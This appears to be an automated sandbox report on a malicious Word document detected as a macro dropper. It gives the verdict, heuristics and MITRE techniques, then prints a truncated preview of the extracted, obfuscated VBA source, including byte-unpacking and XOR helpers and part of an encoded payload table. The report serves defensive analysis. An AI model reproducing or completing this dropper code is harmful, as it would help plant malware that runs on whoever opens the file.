Verdict: MALICIOUS
Risk Score: 222

Malware Insights

MITRE ATT&CK
- T1059.005 Visual Basic
- T1059 Command and Scripting Interpreter
- T1204.002 Malicious File

The file contains VBA macros, including a Document_Open macro that calls the Shell() function. This indicates the macro is designed to execute external commands, a common technique for downloading and running additional malicious payloads. The ClamAV detection name 'Doc.Dropper.Agent-6387328-0' further supports its role as a dropper.
Heuristics (6)

- ClamAV: Doc.Dropper.Agent-6387328-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Dropper.Agent-6387328-0
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings): Document contains VBA macro code
- Shell() call in VBA (critical, OLE_VBA_SHELL): Shell() call in VBA
- Document_Open macro (high, OLE_VBA_DOCOPEN): Document_Open macro
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://www.iec.ch (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/ (in document text, OLE body)
  - http://www.w3.org/1999/02/22-rdf-syntax-ns# (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/mm/ (in document text, OLE body)
  - http://ns.adobe.com/xap/1.0/sType/ResourceEvent# (in document text, OLE body)
  - http://purl.org/dc/elements/1.1/ (in document text, OLE body)
  - http://ns.adobe.com/photoshop/1.0/ (in document text, OLE body)
  - http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)

Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 68493 bytes |

SHA-256: 1c18770591bba26ace00384307fdef7efe668915f536f783adb17faaf6b3a44f

Preview script (first 1,000 lines of the extracted script):

```vb
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Module-level table of obfuscated payload words, filled in by VVjDWvBSA() below.
Dim EZBUxrMgti(1928) As Long

' Splits a 32-bit Long into its four bytes (most-significant first), then
' reverses the array. The "x = Year(Now) 'nn" lines are junk statements
' inserted as padding; they have no effect on the result.
Function VGda0v(CVRuQ3qS4e33O As Long) As Byte()
    GLP = Year(Now) '66
    Dim Y3yISIg5P(3) As Byte, KiowXBd1q9cprQgD6 As Long, Eh9Eufe4j0Ph As Byte
    DWQtYLunihx = Year(Now) '49
    For KiowXBd1q9cprQgD6 = 0 To 3
        Y3yISIg5P(KiowXBd1q9cprQgD6) = (Int(CVRuQ3qS4e33O / (2 ^ (8 * (3 - KiowXBd1q9cprQgD6))))) And ((2 ^ 8) - 1)
    Next KiowXBd1q9cprQgD6
    Kl3YBIXppostZ = Year(Now) '52
    For KiowXBd1q9cprQgD6 = 0 To UnnkInXZpTNxhldyX(Y3yISIg5P) \ 2
        Eh9Eufe4j0Ph = Y3yISIg5P(KiowXBd1q9cprQgD6)
        Y3yISIg5P(KiowXBd1q9cprQgD6) = Y3yISIg5P(UnnkInXZpTNxhldyX(Y3yISIg5P) - KiowXBd1q9cprQgD6)
        Y3yISIg5P(UnnkInXZpTNxhldyX(Y3yISIg5P) - KiowXBd1q9cprQgD6) = Eh9Eufe4j0Ph
    Next KiowXBd1q9cprQgD6
    EDVA83hipPoXI6 = Year(Now) '24
    ReDim VGda0v(3) As Byte
    EZ3anepbmJd = Year(Now) '71
    VGda0v = Y3yISIg5P
    WI1LOrb8uvzn = Year(Now) '7
End Function

' Bitwise XOR written out as (A And Not B) Or (Not A And B).
Function LX8y7Eu(QMDzoFzMzryYTOZV, RtYQC)
    KTJ45dvAGAX8jRjoF = Year(Now) '17
    LX8y7Eu = (QMDzoFzMzryYTOZV And Not RtYQC) Or (Not QMDzoFzMzryYTOZV And RtYQC)
    IaUgs = Year(Now) '56
End Function

' Populates the payload table one Long at a time.
Sub VVjDWvBSA()
    EZBUxrMgti(0) = -1216365514
    EZBUxrMgti(1) = -391788152
    EZBUxrMgti(2) = 2027679526
    EZBUxrMgti(3) = -375198929
    EZBUxrMgti(4) = -2003149401
    EZBUxrMgti(5) = 1882876980
    EZBUxrMgti(6) = -1322499116
    EZBUxrMgti(7) = -5723738
    EZBUxrMgti(8) = 1068129616
    EZBUxrMgti(9) = -1007323543
    EZBUxrMgti(10) = -1928797872
    EZBUxrMgti(11) = -269304919
    EZBUxrMgti(12) = 1128308244
    EZBUxrMgti(13) = 741998454
    EZBUxrMgti(14) = -2021644803
    EZBUxrMgti(15) = -51279042
    EZBUxrMgti(16) = 1292876241
    EZBUxrMgti(17) = -627703807
    EZBUxrMgti(18) = 534159863
    EZBUxrMgti(19) = 530390716
    EZBUxrMgti(20) = -1269711569
    EZBUxrMgti(21) = 1915484864
    EZBUxrMgti(22) = 1832650568
    EZBUxrMgti(23) = 220456815
    EZBUxrMgti(24) = -1656951883
    EZBUxrMgti(25) = -1577247004
    EZBUxrMgti(26) = -18678344
    EZBUxrMgti(27) = 2033417728
    EZBUxrMgti(28) = -633059296
    EZBUxrMgti(29) = -685541798
    EZBUxrMgti(30) = -1587526070
    EZBUxrMgti(31) = -679977201
    EZBUxrMgti(32) = -1576264837
    EZBUxrMgti(33) = -1598415633
    EZBUxrMgti(34) = 93876531
    EZBUxrMgti(35) = 1319757431
    EZBUxrMgti(36) = 1673020866
    EZBUxrMgti(37) = 1488120867
    EZBUxrMgti(38) = -2092578478
    EZBUxrMgti(39) = 642870006
    EZBUxrMgti(40) = 1738378266
    EZBUxrMgti(41) = 2027024086
    EZBUxrMgti(42) = 1309077496
    EZBUxrMgti(43) = -730534698
    EZBUxrMgti(44) = -1829978206
    EZBUxrMgti(45) = 1473844317
    EZBUxrMgti(46) = 445968286
    EZBUxrMgti(47) = 1802056272
    EZBUxrMgti(48) = -1424488361
    EZBUxrMgti(49) = 991713433
    EZBUxrMgti(50) = 44443320
    EZBUxrMgti(51) = -1300872522
    EZBUxrMgti(52) = 1993599935
    EZBUxrMgti(53) = -1463122895
    EZBUxrMgti(54) = -1477541869
    EZBUxrMgti(55) = -1427691169
    EZBUxrMgti(56) = 1888249558
    EZBUxrMgti(57) = 1666851206
    EZBUxrMgti(58) = 1167163538
    EZBUxrMgti(59) = -1591008728
    EZBUxrMgti(60) = 1200564505
    EZBUxrMgti(61) = 220061381
    EZBUxrMgti(62) = 1813488635
    EZBUxrMgti(63) = 501339776
    EZBUxrMgti(64) = -384504673
    EZBUxrMgti(65) = 1510740506
    EZBUxrMgti(66) = -492856536
    EZBUxrMgti(67) = -1900746881
    EZBUxrMgti(68) = -686569802
    EZBUxrMgti(69) = -1717281866
    EZBUxrMgti(70) = -1313650096
    EZBUxrMgti(71) = -1166294070
    EZBUxrMgti(72) = 970671303
    EZBUxrMgti(73) = -1301433952
    EZBUxrMgti(74) = -431379324
    EZBUxrMgti(75) = 1201403954
    EZBUxrMgti(76) = -184154001
    EZBUxrMgti(77) = 1424884037
    EZBUxrMgti(78) = 1221967930
    EZBUxrMgti(79) = 297757055
    EZBUxrMgti(80) = 2017765735
    EZBUxrMgti(81) = -778966938
    EZBUxrMgti(82) = 1084314985
    EZBUxrMgti(83) = 1204195672
    EZBUxrMgti(84) = -1816697920
    EZBUxrMgti(85) = 1687759259
    EZBUxrMgti(86) = -41985771
    EZBUxrMgti(87) = 1993143836
    EZBUxrMgti(88) = 1805314717
    EZBUxrMgti(89) = 836518297
    EZBUxrMgti(90) = -960099179
    EZBUxrMgti(91) = 979136471
    EZBUxrMgti(92) = -16550094
    EZBUxrMgti(93) = -1138629832
    EZBUxrMgti(94) = 1426245014
    ... (truncated)
```